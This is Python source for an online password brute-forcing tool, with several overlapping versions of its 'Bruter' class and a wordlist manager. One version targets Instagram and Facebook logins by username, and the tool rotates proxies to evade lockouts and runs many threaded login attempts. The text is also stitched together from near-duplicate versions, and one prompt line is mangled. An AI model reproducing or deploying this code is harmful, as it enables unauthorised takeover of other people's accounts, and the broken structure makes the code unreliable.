def args(): enable_colors = str(input('Enable colors? (default: y) [y/n]: ')) if not enable_colors: enable_colors = True else: if enable_colors[0].lower() == 'n': enable_colors = False display = Display(is_color=enable_colors) username = display.prompt('Enter a username: '******'You can\'t leave this field empty') display.wait() exit() passlist = display.prompt('Enter the path to your password list: ') if not exists(passlist): display.warning('Invalid path to password list', False) display.wait() exit() display.info( '''Modes:\r 0: => 512 passwords at a time 1: => 256 passwords at a time 2: => 128 passwords at a time 3: => 64 passwords at a time ''', False) mode = display.prompt('Select a mode [0, 1, 2, 3]: ', False) if not mode.isdigit(): display.warning('Mode must be a number', False) display.wait() exit() mode = int(mode) if int(mode) > 3: display.warning('Mode must be no more than 3', False) display.wait() exit() if int(mode) < 0: display.warning('Mode must bot no less than 0', False) display.wait() exit() return [username, passlist, mode]
class Bruter(object): def __init__(self, username: str, threads: int, passlist_path: str): self.is_alive = True self.is_found = False self.password: str = None self.username: str = username self.last_password: str = None self.bots_per_proxy = 0 self.total_threads: int = threads self.proxy_manager = ProxyManager() self.display = Display(username, passlist_path) self.password_manager = PasswordManager(username, passlist_path, threads, self.display) self.browsers: typing.List[Browser] = [] self.active_passwords: typing.List[str] = [] self.unstarted_browsers: typing.List[Browser] = [] # Locks self.lock_browsers = threading.RLock() self.lock_unstarted_browsers = threading.RLock() self.lock_active_passwords = threading.RLock() self.lock_password_manager = threading.RLock() def manage_session(self): if self.password_manager.is_read: if not self.password_manager.list_size or self.is_found: self.password_manager.session.delete() else: if self.is_found: self.password_manager.session.delete() else: self.password_manager.session.write( self.password_manager.attempts, self.password_manager.passlist, ) def browser_manager(self): while self.is_alive: browsers: typing.List[Browser] = [] with self.lock_browsers: browsers = [br for br in self.browsers] for browser in browsers: if not self.is_alive: break if (Display.account_exists == None and Browser.account_exists != None): Display.account_exists = Browser.account_exists if not browser.is_active: if browser.is_attempted and not browser.is_locked: if browser.is_found and not self.is_found: self.password = browser.password self.is_found = True with self.lock_password_manager: self.password_manager.list_remove(browser.password) self.remove_browser(browser) else: if browser.start_time: if (time.time() - browser.start_time >= max_time_to_wait): browser.close() with self.lock_active_passwords: try: self.active_passwords.remove( browser.password) except ValueError: pass def prune_browsers(self, browser) -> None: """Remove all the browsers with the same password as the given browser""" with self.lock_browsers: for br in list(self.browsers): if br == browser: continue if br.password != browser.password: continue try: self.browsers.remove(br) except ValueError: pass br.close() br.proxy.decr_usage() self.proxy_manager.dispose(br.proxy) with self.lock_unstarted_browsers: for br in list(self.unstarted_browsers): if br.password == browser.password: try: self.unstarted_browsers.remove(br) except ValueError: pass def remove_browser(self, browser: Browser) -> None: self.proxy_manager.dispose(browser.proxy) with self.lock_browsers: try: self.browsers.remove(browser) except ValueError: pass with self.lock_active_passwords: try: self.active_passwords.remove(browser.password) except ValueError: pass if browser.is_attempted: self.prune_browsers(browser) def attack(self): attack_started = False proxy_per_pwd = 3 while self.is_alive: for pwd in self.password_manager.passlist: if not self.is_alive: break with self.lock_unstarted_browsers: if len(self.unstarted_browsers) >= self.total_threads: break with self.lock_active_passwords: if pwd in self.active_passwords: continue is_added = False for _ in range(proxy_per_pwd): with self.lock_unstarted_browsers: if len(self.unstarted_browsers) >= self.total_threads: break proxy = self.proxy_manager.get_proxy() if not proxy: continue with self.lock_unstarted_browsers: self.unstarted_browsers.append( Browser(self.username, pwd, proxy)) is_added = True if not is_added: break with self.lock_active_passwords: self.active_passwords.append(pwd) if not attack_started: self.display.info("Starting attack...") attack_started = True with self.lock_unstarted_browsers: for br in list(self.unstarted_browsers): with self.lock_browsers: if len(self.browsers) >= self.total_threads: break else: self.browsers.append(br) self.unstarted_browsers.remove(br) threading.Thread(target=br.attempt, daemon=True).start() def start_daemon_threads(self): attack = threading.Thread(target=self.attack) browser_manager = threading.Thread(target=self.browser_manager) password_manager = threading.Thread(target=self.password_manager.start) attack.daemon = True browser_manager.daemon = True password_manager.daemon = True attack.start() browser_manager.start() password_manager.start() self.display.info("Searching for proxies...") def stop_daemon_threads(self): self.password_manager.stop() def start(self): self.display.info("Initiating daemon threads...") self.start_daemon_threads() last_attempt = 0 while self.is_alive and not self.is_found: if (last_attempt == self.password_manager.attempts and self.password_manager.attempts): time.sleep(0.65) continue browsers = [] with self.lock_browsers: browsers = [br for br in self.browsers] for browser in browsers: self.display.stats( browser.password, self.password_manager.attempts, len(self.browsers), ) last_attempt = self.password_manager.attempts self.last_password = browser.password if not self.is_alive or self.is_found: break if (self.password_manager.is_read and not self.password_manager.list_size and not len(self.browsers)): self.is_alive = False def stop(self): self.is_alive = False self.manage_session() self.stop_daemon_threads() self.password_manager.session.is_busy = False
class Bruter(object): def __init__(self, username, threads, passlist_path): self.browsers = [] self.lock = RLock() self.password = None self.is_alive = True self.is_found = False self.bots_per_proxy = 0 self.username = username self.last_password = None self.active_passwords = [] self.proxy_manager = ProxyManager() self.display = Display(username, passlist_path) self.password_manager = PasswordManager(username, passlist_path, threads) def manage_session(self): if self.password_manager.is_read: if not self.password_manager.list_size or self.is_found: self.password_manager.session.delete() else: if self.is_found: self.password_manager.session.delete() else: self.password_manager.session.write(self.password_manager.attempts, self.password_manager.passlist) def browser_manager(self): while self.is_alive: for browser in self.browsers: if not self.is_alive: break if Display.account_exists == None and Browser.account_exists != None: Display.account_exists = Browser.account_exists if not browser.is_active: password = browser.password if browser.is_attempted and not browser.is_locked: if browser.is_found and not self.is_found: self.password = password self.is_found = True with self.lock: self.password_manager.list_remove(password) else: with self.lock: self.proxy_manager.bad_proxy(browser.proxy) self.remove_browser(browser) else: if browser.start_time: if time() - browser.start_time >= max_time_to_wait: browser.close() def remove_browser(self, browser): if browser in self.browsers: with self.lock: self.browsers.pop(self.browsers.index(browser)) self.active_passwords.pop( self.active_passwords.index(browser.password) ) def attack(self): proxy = None is_attack_started = False while self.is_alive: browsers = [] for password in self.password_manager.passlist: if not self.is_alive: break if not proxy: proxy = self.proxy_manager.get_proxy() self.bots_per_proxy = 0 if self.bots_per_proxy >= max_bots_per_proxy: proxy = None if not proxy: continue if not password in self.active_passwords and password in self.password_manager.passlist: browser = Browser(self.username, password, proxy) browsers.append(browser) self.bots_per_proxy += 1 if not is_attack_started: self.display.info('Starting attack ...') is_attack_started = True with self.lock: self.browsers.append(browser) self.active_passwords.append(password) for browser in browsers: thread = Thread(target=browser.attempt) thread.daemon = True try: thread.start() except: self.remove_browser(browser) def start_daemon_threads(self): attack = Thread(target=self.attack) browser_manager = Thread(target=self.browser_manager) proxy_manager = Thread(target=self.proxy_manager.start) password_manager = Thread(target=self.password_manager.start) attack.daemon = True proxy_manager.daemon = True browser_manager.daemon = True password_manager.daemon = True attack.start() proxy_manager.start() browser_manager.start() password_manager.start() self.display.info('Searching for proxies ...') def stop_daemon_threads(self): self.proxy_manager.stop() self.password_manager.stop() def start(self): self.display.info('Initiating daemon threads ...') self.start_daemon_threads() last_attempt = 0 while self.is_alive and not self.is_found: if last_attempt == self.password_manager.attempts and self.password_manager.attempts: sleep(1.5) continue for browser in self.browsers: self.display.stats( browser.password, self.password_manager.attempts, len(self.browsers)) last_attempt = self.password_manager.attempts self.last_password = browser.password if not self.is_alive or self.is_found: break if self.password_manager.is_read and not self.password_manager.list_size and not len(self.browsers): self.is_alive = False def stop(self): self.is_alive = False self.manage_session() self.stop_daemon_threads() self.password_manager.session.is_busy = False
class Bruter: def __init__(self, service, username, threads, passlist_path): self.browsers = [] self.lock = RLock() self.password = None self.is_alive = True self.is_found = False self.bots_per_proxy = 0 self.service = service.casefold().strip() self.username = username self.last_password = None self.active_passwords = [] self.proxy_manager = ProxyManager() self.display = Display(username, passlist_path) self.password_manager = PasswordManager(service, username, passlist_path, threads, self.display) def manage_session(self): if self.password_manager.is_read: if not self.password_manager.list_size or self.is_found: self.password_manager.session.delete() else: if self.is_found: self.password_manager.session.delete() else: self.password_manager.session.write( self.password_manager.attempts, self.password_manager.passlist) def browser_manager(self): while self.is_alive: for browser in self.browsers: if not self.is_alive: break account_exists = self.create_browser( None, None).__class__.account_exists if Display.account_exists is None and account_exists is not None: Display.account_exists = account_exists if not browser.is_active: password = browser.password if browser.is_attempted and not browser.is_locked: if browser.is_found and not self.is_found: self.password = password self.is_found = True with self.lock: self.password_manager.list_remove(password) else: with self.lock: self.proxy_manager.bad_proxy(browser.proxy) self.remove_browser(browser) else: if browser.start_time: if time() - browser.start_time >= max_time_to_wait: browser.close() def remove_browser(self, browser): if browser in self.browsers: with self.lock: self.browsers.pop(self.browsers.index(browser)) self.active_passwords.pop( self.active_passwords.index(browser.password)) def create_browser(self, password, proxy): from lib.browsers.instagram import InstagramBrowser from lib.browsers.facebook import FacebookBrowser if self.service == 'instagram': return InstagramBrowser(self.username, password, proxy) if self.service == 'facebook': return FacebookBrowser(self.username, password, proxy) else: self.display.warning('Browser not found for service {}'.format( self.service)) raise RuntimeError('') def attack(self): proxy = None is_attack_started = False while self.is_alive: browsers = [] for password in self.password_manager.passlist: if not self.is_alive: break if not proxy: proxy = self.proxy_manager.get_proxy() self.bots_per_proxy = 0 if self.bots_per_proxy >= max_bots_per_proxy: proxy = None if not proxy: continue if password not in self.active_passwords and password in self.password_manager.passlist: browser = self.create_browser(password, proxy) browsers.append(browser) self.bots_per_proxy += 1 if not is_attack_started: self.display.info('Starting attack ...') is_attack_started = True with self.lock: self.browsers.append(browser) self.active_passwords.append(password) for browser in browsers: thread = Thread(target=browser.attempt) thread.daemon = True try: thread.start() except: self.remove_browser(browser) def start_daemon_threads(self): attack = Thread(target=self.attack) browser_manager = Thread(target=self.browser_manager) proxy_manager = Thread(target=self.proxy_manager.start) password_manager = Thread(target=self.password_manager.start) attack.daemon = True proxy_manager.daemon = True browser_manager.daemon = True password_manager.daemon = True attack.start() proxy_manager.start() browser_manager.start() password_manager.start() self.display.info('Searching for proxies ...') def stop_daemon_threads(self): self.proxy_manager.stop() self.password_manager.stop() def start(self): self.display.info('Initiating daemon threads ...') self.start_daemon_threads() last_attempt = 0 while self.is_alive and not self.is_found: if last_attempt == self.password_manager.attempts and self.password_manager.attempts: sleep(1.5) continue for browser in self.browsers: self.display.stats(browser.password, self.password_manager.attempts, len(self.browsers)) last_attempt = self.password_manager.attempts self.last_password = browser.password if not self.is_alive or self.is_found: break if self.password_manager.is_read and not self.password_manager.list_size and not len( self.browsers): self.is_alive = False def stop(self): self.is_alive = False self.manage_session() self.stop_daemon_threads() self.password_manager.session.is_busy = False
class Password: '''Password manager. ''' def __init__(self, username, wordlist, max_passwords=64) -> None: # Consts self.session = None self.wordlist = wordlist self.username = username self.display = Display() self.max_passwords = max_passwords self.total_lines = self.count_lines(wordlist) # States self.EOF = False # end of file self.is_alive = True # resume self.attempts = 0 self.resume = False # Storages self.passwords = deque() def check_password_path(self) -> None: '''Checks to see if password path exists. ''' if not os.path.exists(self.wordlist): self.display.danger('Error', ':', 'Failed to locate the password list provided') exit() def count_lines(self, wordlist) -> int: '''Count the number of lines in the wordlist. ''' self.display.clear() self.check_password_path() lines = 0 fingerprint = sha256( self.username.lower().strip().encode()).hexdigest().encode() self.display.info('Loading password list', '', '...') time.sleep(3) with open(wordlist, 'rb') as f: for data in f: lines += 1 chunk = sha256(data).hexdigest().encode() fingerprint = sha256(fingerprint + chunk).hexdigest().encode() self.session = Session(fingerprint) return lines def read_file(self) -> None: '''Read each line and append into the passwords deque. ''' attempts = 0 # for resuming with open(self.wordlist, 'rt', encoding='utf-8') as f: for line in f: if self.resume: if attempts < self.attempts + self.size(): attempts += 1 continue elif self.resume: self.resume = False while self.size() >= self.max_passwords: if self.is_alive: time.sleep(0.5) continue else: break if not self.is_alive: break self.put_password(line.strip()) # check if EOF is reached if self.is_alive: self.EOF = True self.stop() def put_password(self, pwd) -> None: '''Put a password into the passwords deque. ''' if not pwd in self.passwords: self.passwords.appendleft(pwd) def size(self) -> int: '''Returns the size of the passwords deque. ''' return len(self.passwords) def is_done(self) -> bool: '''Returns turn if EOF is reached and the passwords deque is empty. ''' if self.EOF and self.size() == 0: return True return False def get_password(self) -> str: '''Get a password from the passwords deque. Returns an empty str if deque is empty. ''' if self.size() == 0: return '' return self.passwords.popleft() def start(self) -> None: self.read_file() def stop(self) -> None: self.is_alive = False